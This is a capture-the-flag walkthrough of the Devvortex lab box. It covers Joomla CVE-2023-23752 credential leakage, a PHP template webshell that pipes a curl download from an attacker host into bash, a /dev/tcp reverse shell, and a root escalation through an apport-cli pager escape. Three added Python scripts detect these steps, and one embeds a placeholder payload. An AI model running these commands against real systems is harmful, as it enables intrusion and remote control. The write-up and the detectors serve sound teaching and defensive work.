Devvortex
Devvortex Linux · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -Pn -sSVC 10.129.229.146
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 13:09 CET
Nmap scan report for 10.129.229.146
Host is up (0.046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.01 seconds
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' --hc 301,302
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://devvortex.htb/
Total requests: 114442
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 501 L 1581 W 23221 Ch "dev"
Total time: 0
Processed Requests: 114442
Filtered Requests: 114441
Requests/sec.: 0
The initial site http://devvortex.htb has static content, so there is little or nothing to be done with it; that means we have to dig, with dirsearch or another tool, for interesting subdirectories or subdomains. I discover a subdomain, http://dev.devvortex.htb
CVE: CVE-2023-23752
🔭 Reconnaissance:
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
With JoomScan we obtain the Joomla version, 4.2.6
💣 Preparation:
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > exploit
[+] Users JSON saved to /home/pmartinezr/.msf4/loot/20260107152947_default_10.129.229.146_joomla.users_821206.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
649 * lewis lewis lewis@devvortex.htb 1 2023-09-25 16:44:24 2023-10-29 16:18:50 Super Users
650 logan paul logan logan@devvortex.htb 0 2023-09-26 19:15:42 Registered
[+] Config JSON saved to /home/pmartinezr/.msf4/loot/20260107152947_default_10.129.229.146_joomla.config_659001.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
With the Metasploit module scanner/http/joomla_api_improper_access_checks we obtain a user, lewis, and a password, P4ntherg0t1n5r3c0n##
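As an added defender-side example (not code from this write-up, from Joomla or from Metasploit), the following Python script flags the request pattern behind CVE-2023-23752 in nginx access logs: unauthenticated requests to the Joomla web-services API endpoints /api/index.php/v1/config/application and /api/index.php/v1/users with public=true, which are the endpoints the Metasploit module above reads the users and the database configuration from. The log lines are constructed for the example; the endpoint list and the fixed release (Joomla 4.2.8) are assumptions based on the public advisory, not on anything shown on this page.

```python
"""Flag unauthenticated Joomla web-service API requests that match the
CVE-2023-23752 information-disclosure pattern in nginx access logs.

Added example for the write-up, not part of the original post or of any
Joomla/Metasploit code. The log lines below are constructed, not captured
from the box."""
import re
from urllib.parse import urlsplit, parse_qs

# nginx "combined" log format:
# ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Endpoints that answered without authentication in Joomla 4.0.0 - 4.2.7
# (assumption from the public advisory; fixed in 4.2.8).
SENSITIVE_ENDPOINTS = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
)


def is_api_leak_attempt(line):
    """Return a dict describing the request if it matches the leak pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if not any(url.path.startswith(ep) for ep in SENSITIVE_ENDPOINTS):
        return None
    params = parse_qs(url.query)
    # The access-check bypass is requested with public=true
    if params.get("public", [""])[0].lower() != "true":
        return None
    return {
        "ip": m.group("ip"),
        "endpoint": url.path,
        "status": int(m.group("status")),
        # A 200 means the server actually handed the data back
        "leaked": m.group("status") == "200",
    }


def scan(lines):
    """Run is_api_leak_attempt over every line and keep the hits, in log order."""
    return [hit for hit in map(is_api_leak_attempt, lines) if hit]


# Constructed sample log lines (not from the box): one ordinary page view, two
# unauthenticated API pulls that succeeded, and one rejected after patching.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jan/2026:15:29:40 +0100] "GET /index.php HTTP/1.1" 200 23221 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jan/2026:15:29:47 +0100] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1203 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jan/2026:15:29:48 +0100] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 845 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Jan/2026:09:00:01 +0100] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 0 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A successful hit with leaked=True on the config endpoint should be treated as a credential exposure of the database user and password, exactly the data the module printed above, and the database password rotated; on a patched install the same requests are rejected and only show up as attempts.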
👽 Actions:
Now we can log in to the Joomla dashboard with the user lewis and the password P4ntherg0t1n5r3c0n##; this is one of the administrators, so we have practically full control over the Joomla application.
I edit the template, specifically error.php; for the other files we have no write permission and that would prevent saving the template files.
system("curl 10.10.14.110:8000/rev.sh|bash");
┌──(pmartinezr㉿kali)-[~/htb/devvortex]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.229.146 - - [07/Jan/2026 19:17:29] "GET /rev.sh HTTP/1.1" 200 -
I tried the exploitation with a reverse shell based on this tutorial https://vk9-sec.com/exploitation-reverse-shell-joomla/ However, something that seemed more "standard", system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.166/4444 0>&1'");, did not work, and in the end I chose to do it with curl and fetch a reverse shell served with Python. We put the following code in error.php <?php system("curl 10.10.14.70:8000/rev.sh|bash"); ?> and press the save button.
┌──(pmartinezr㉿kali)-[~/htb/devvortex]
└─$ cat rev.sh
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.110/4444 0>&1
The content of rev.sh is a simple Bash reverse shell.
┌──(pmartinezr㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.129.229.146] 45918
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p
mysql -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 552
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
mysql> select * from sd4fg_users;
select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2026-01-07 14:31:19 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
Now we just have to visit the page and receive the reverse shell, either with the browser or with curl.
We had the MySQL password, so it was a good idea to look for something in the database.
With hashcat we obtain the following password: $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
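The foothold above works by turning a template file, error.php, into a command runner from the administrator panel. As an added example (written for this write-up, not Joomla's own code) the Python script below detects that kind of tampering: it walks a templates directory, flags any PHP file that calls a command-execution function, and compares each file's SHA-256 against a baseline taken from a known-good install. The directory tree is built in a temporary folder with constructed files so it runs offline; the template name cassiopeia (Joomla 4's default template) and the ATTACKER_HOST placeholder in the simulated payload are assumptions, not values from the page.

```python
"""Spot Joomla template PHP files that have been turned into command runners,
as happened here with error.php. Added example for the write-up; it is not
Joomla's own code. The baseline is a dict of relative path -> sha256 recorded
on a known-good install (in practice, from the fresh package or a prior scan)."""
import hashlib
import os
import re
import tempfile

# PHP functions that hand a string to a shell or to the PHP engine; a stock
# Joomla template has no reason to call them from error.php or index.php.
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.IGNORECASE
)


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_templates(root, baseline):
    """Return sorted (relative path, reason) findings for every PHP file under
    root that contains a dangerous call, differs from the baseline, or is new."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            m = DANGEROUS_CALLS.search(source)
            if m:
                findings.append((rel, f"calls {m.group(1)}()"))
            digest = sha256_of(full)
            if rel not in baseline:
                findings.append((rel, "file not in baseline"))
            elif baseline[rel] != digest:
                findings.append((rel, "hash differs from baseline"))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed template tree: a clean index.php and a tampered
    error.php, plus the baseline recorded before the tampering."""
    root = tempfile.mkdtemp(prefix="joomla-tpl-")
    tpl = os.path.join(root, "templates", "cassiopeia")  # assumed template name
    os.makedirs(tpl)
    clean_index = "<?php defined('_JEXEC') or die; echo 'page'; ?>\n"
    clean_error = "<?php defined('_JEXEC') or die; echo 'error'; ?>\n"
    with open(os.path.join(tpl, "index.php"), "w") as fh:
        fh.write(clean_index)
    with open(os.path.join(tpl, "error.php"), "w") as fh:
        fh.write(clean_error)
    # Baseline taken while both files are still clean
    baseline = {
        "templates/cassiopeia/index.php": sha256_of(os.path.join(tpl, "index.php")),
        "templates/cassiopeia/error.php": sha256_of(os.path.join(tpl, "error.php")),
    }
    # Simulate the tampering from the write-up: a command-execution call appended
    # to error.php (ATTACKER_HOST is a placeholder, not a real address)
    with open(os.path.join(tpl, "error.php"), "w") as fh:
        fh.write(clean_error + '<?php system("curl ATTACKER_HOST:8000/rev.sh|bash"); ?>\n')
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_demo_tree()
    for rel, reason in scan_templates(root, baseline):
        print(f"{rel}: {reason}")
```

On a real install the baseline would be generated from the unpacked release package, and the scan scheduled to run from a host the web user cannot write to; the hash comparison catches edits that avoid the obvious function names, while the regex gives an immediate reason for the common case.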
logan@devvortex:~$ cat user.txt
d2888a2af9c4aa65de8a56ff2ea1f100
Now we connect to the SSH service and obtain the first flag, user.txt
CVE: CVE-2023-1326
🔭 Reconnaissance:
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
This CVE leads us to the privilege escalation; it is enough to search the Internet for a little information about apport-cli
👽 Actions:
logan@devvortex:~$ sudo /usr/bin/apport-cli -f -P 3333
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.......................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (7.3 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
:!/bin/bash
root@devvortex:/home/logan# cat /root/root.txt
2df500d64e3398cff51fc24fef4c3548
During the execution of apport-cli we enter !/bin/bash at the : prompt and the privilege escalation is complete
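The root cause on the defensive side is the sudo rule itself: granting /usr/bin/apport-cli as root hands over the interactive pager that "V: View report" opens, and on the apport versions affected by CVE-2023-1326 that pager runs as root. As an added example (not taken from sudo or apport), the Python script below audits sudoers-style rule lines for that pattern. The rule lines are constructed, the box's real rule among them; the parser handles the common "user host = (runas) [NOPASSWD:] command" shape, not the full sudoers grammar, and the list of flagged binaries contains only the one from this box.

```python
"""Audit sudoers-style rules for a user allowed to run /usr/bin/apport-cli as
root, the rule that led to the root shell in this write-up. Added example,
not sudo's or apport's code; the rule lines are constructed."""
import re

# user  host = (runas[:group]) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Commands known to hand the run-as user an interactive pager or editor.
# Only the one from this box is listed; extend it from your own findings.
SHELL_ESCAPE_COMMANDS = {
    "/usr/bin/apport-cli": "CVE-2023-1326: 'View report' opens a pager that can run commands",
}


def audit_rules(lines):
    """Return one finding per rule that lets a user run a listed binary as root."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # No (runas) clause means root, sudo's default target user
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0] if cmd else ""
            if binary in SHELL_ESCAPE_COMMANDS and runas in ("root", "ALL"):
                findings.append({
                    "user": m.group("user"),
                    "binary": binary,
                    "nopasswd": "NOPASSWD:" in m.group("tags"),
                    "reason": SHELL_ESCAPE_COMMANDS[binary],
                })
    return findings


# Constructed sample rules; the third line is the rule shown by sudo -l above.
SAMPLE_SUDOERS = [
    "# constructed sample, not the box's real file",
    "Defaults env_reset, mail_badpass",
    "logan ALL=(ALL:ALL) /usr/bin/apport-cli",
    "backup ALL=(root) NOPASSWD: /usr/bin/rsync",
    "deploy ALL=(www-data) /usr/bin/apport-cli",  # runs as www-data, not root
]

if __name__ == "__main__":
    for f in audit_rules(SAMPLE_SUDOERS):
        print(f"{f['user']} may run {f['binary']} as root: {f['reason']}")
```

The fix for a flagged rule is to remove it (or point it at a wrapper that never opens a pager) and to update apport to a release where CVE-2023-1326 is fixed; the sudo log line "COMMAND=/usr/bin/apport-cli" is the only trace the escalation leaves, since the shell spawned from the pager is never seen by sudo.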